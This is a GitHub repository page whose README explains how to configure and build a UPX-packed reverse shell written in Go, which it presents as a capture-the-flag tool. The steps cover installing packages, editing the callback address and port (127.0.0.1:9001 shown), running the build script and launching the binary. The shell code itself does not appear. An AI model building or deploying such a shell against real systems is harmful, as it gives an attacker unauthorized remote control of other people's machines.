Skip to content

TheeNawMan/goReverseShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

goReverseShell

To use this shell you need to install and update some current pacakages to be effective.

Debian

sudo apt install git golang upx

Clone the repo

# install golang and upx
git clone https://github.com/TheeNawMan/goReverseShell
cd goReverseShell

Edit main.go to put in the information we want to use.

nano main.go

Edit lines 65-66 for your default values or use command line

	Addr := "127.0.0.1"
	Port := "9001"
./linux-amd64 127.0.0.1 9001

Lets build :)

chmod +x build.sh
./build.sh

About

A upx packed reverse shell written in go. Used in CTF(s) everywhere.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors